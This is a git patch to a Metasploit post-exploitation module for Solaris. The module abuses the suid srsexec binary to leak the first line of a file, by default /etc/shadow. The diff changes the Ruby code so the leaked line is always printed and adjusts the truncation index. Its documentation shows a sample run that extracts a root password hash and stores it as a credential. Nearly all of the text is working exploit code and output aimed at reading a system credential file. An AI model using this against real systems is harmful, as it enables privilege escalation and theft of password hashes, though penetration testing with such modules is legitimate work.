From ee0776b095bd46b203a3440f2f6c889d52eb18db Mon Sep 17 00:00:00 2001 From: h00die Date: Thu, 20 Sep 2018 20:54:41 -0400 Subject: [PATCH] print when not verbose --- .../post/solaris/escalate/srsexec_readline.md | 17 +++++++++-------- .../post/solaris/escalate/srsexec_readline.rb | 9 ++++++--- 2 files changed, 15 insertions(+), 11 deletions(-) diff --git a/documentation/modules/post/solaris/escalate/srsexec_readline.md b/documentation/modules/post/solaris/escalate/srsexec_readline.md index 34f85c3b49..c3741db5b0 100644 --- a/documentation/modules/post/solaris/escalate/srsexec_readline.md +++ b/documentation/modules/post/solaris/escalate/srsexec_readline.md @@ -42,21 +42,22 @@ msf5 post(solaris/escalate/srsexec_readline) > run [+] 3.2.4 is vulnerable -[+] Output: verify_binary(wsltw) -srsexec: binary_name: wsltw -srsexec: name_buf: wsltw_______________ +[+] Raw Command Output: verify_binary(vFYZf) +srsexec: binary_name: vFYZf +srsexec: name_buf: vFYZf_______________ binaries file line: root:MW7h.vpI1Kq1g:1 binaries file line: :17599:::::: smmsp:NP -Security verification failed for binary: wsltw +Security verification failed for binary: vFYZf see SYSLOG(/var/adm/messages) for errors -[+] Adding root's hash added to credential database. +[+] First line of /etc/shadow: root:MW7h.vpI1Kq1g:17599:::::: +[+] Adding root's hash to the credential database. [*] Post module execution completed msf5 post(solaris/escalate/srsexec_readline) > creds Credentials =========== -host origin service public private realm private_type ----- ------ ------- ------ ------- ----- ------------ - 1.1.1.1 root MW7h.vpI1Kq1g Nonreplayable hash +host origin service public private realm private_type +---- ------ ------- ------ ------- ----- ------------ + 1.1.1.1 root MW7h.vpI1Kq1g Nonreplayable hash ``` diff --git a/modules/post/solaris/escalate/srsexec_readline.rb b/modules/post/solaris/escalate/srsexec_readline.rb index e11bf176ee..7a6037f09b 100644 --- a/modules/post/solaris/escalate/srsexec_readline.rb +++ b/modules/post/solaris/escalate/srsexec_readline.rb @@ -76,8 +76,7 @@ class MetasploitModule < Msf::Post flag = Rex::Text.rand_text_alpha 5 output = cmd_exec("#{suid_bin_path} -dvb #{datastore['FILE']} #{flag}") - vprint_good("Output: #{output}") - return unless datastore['FILE'] == '/etc/shadow' + vprint_good("Raw Command Output: #{output}") # The first line of the file is cut at 20 characters. # If the output is longer than 20 characters, then @@ -85,10 +84,14 @@ class MetasploitModule < Msf::Post # followed by the next 18 characters. formatted_output = output.scan(/binaries file line: (.+)$/).flatten.map { |line| - (line.length == 20) ? line[0..18] : line + (line.length == 20) ? line[0..17] : line }.join return if formatted_output.empty? + + print_good("First line of #{datastore['FILE']}: #{formatted_output}") + + return unless datastore['FILE'] == '/etc/shadow' print_good("Adding root's hash to the credential database.") credential_data = { origin_type: :session,